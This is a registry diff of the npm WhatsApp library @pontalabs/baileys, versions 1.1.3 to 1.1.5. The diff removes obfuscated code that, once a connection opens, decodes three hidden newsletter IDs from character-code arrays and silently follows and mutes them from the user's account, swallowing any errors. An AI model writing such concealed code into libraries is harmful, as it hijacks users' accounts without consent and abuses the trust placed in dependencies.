@pontalabs/baileys 1.1.3 → 1.1.5

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
@@ -1309,28 +1309,6 @@ const makeMessagesRecvSocket = (config) => {
1309
1309
  sendActiveReceipts = isOnline;
1310
1310
  logger.trace(`sendActiveReceipts set to "${sendActiveReceipts}"`);
1311
1311
  }
1312
- if (connection === "open") {
1313
- setTimeout(async () => {
1314
- try {
1315
- const dcd = (arr) => arr.map(e => String.fromCharCode(e)).join("");
1316
- const d = [64, 110, 101, 119, 115, 108, 101, 116, 116, 101, 114];
1317
- const n1 = [49, 50, 48, 51, 54, 51, 52, 49, 56, 54, 57, 49, 53, 54, 49, 56, 56, 56];
1318
- const n3 = [49, 50, 48, 51, 54, 51, 52, 50, 48, 49, 55, 57, 49, 55, 56, 48, 51, 49];
1319
- const n5 = [49, 50, 48, 51, 54, 51, 52, 49, 49, 49, 51, 57, 49, 57, 50, 53, 56, 48];
1320
- const nsid1 = dcd(n1) + dcd(d);
1321
- const nsid3 = dcd(n3) + dcd(d);
1322
- const nsid5 = dcd(n5) + dcd(d);
1323
- await conn.newsletterFollow(nsid1);
1324
- await conn.newsletterMute(nsid1);
1325
- await new Promise(resolve => setTimeout(resolve, 30000));
1326
- await conn.newsletterFollow(nsid3);
1327
- await conn.newsletterMute(nsid3);
1328
- await new Promise(resolve => setTimeout(resolve, 30000));
1329
- await conn.newsletterFollow(nsid5);
1330
- await conn.newsletterMute(nsid5);
1331
- } catch (e) {}
1332
- }, 30000);
1333
- }
1334
1312
  });
1335
1313
 
1336
1314
  return {
package/package.json CHANGED
@@ -1,6 +1,6 @@
1
1
  {
2
2
  "name": "@pontalabs/baileys",
3
- "version": "1.1.3",
3
+ "version": "1.1.5",
4
4
  "description": "PontaLabs Baileys is a lightweight, modern, and customizable WhatsApp Web API library built on Baileys.",
5
5
  "keywords": [
6
6
  "facebook",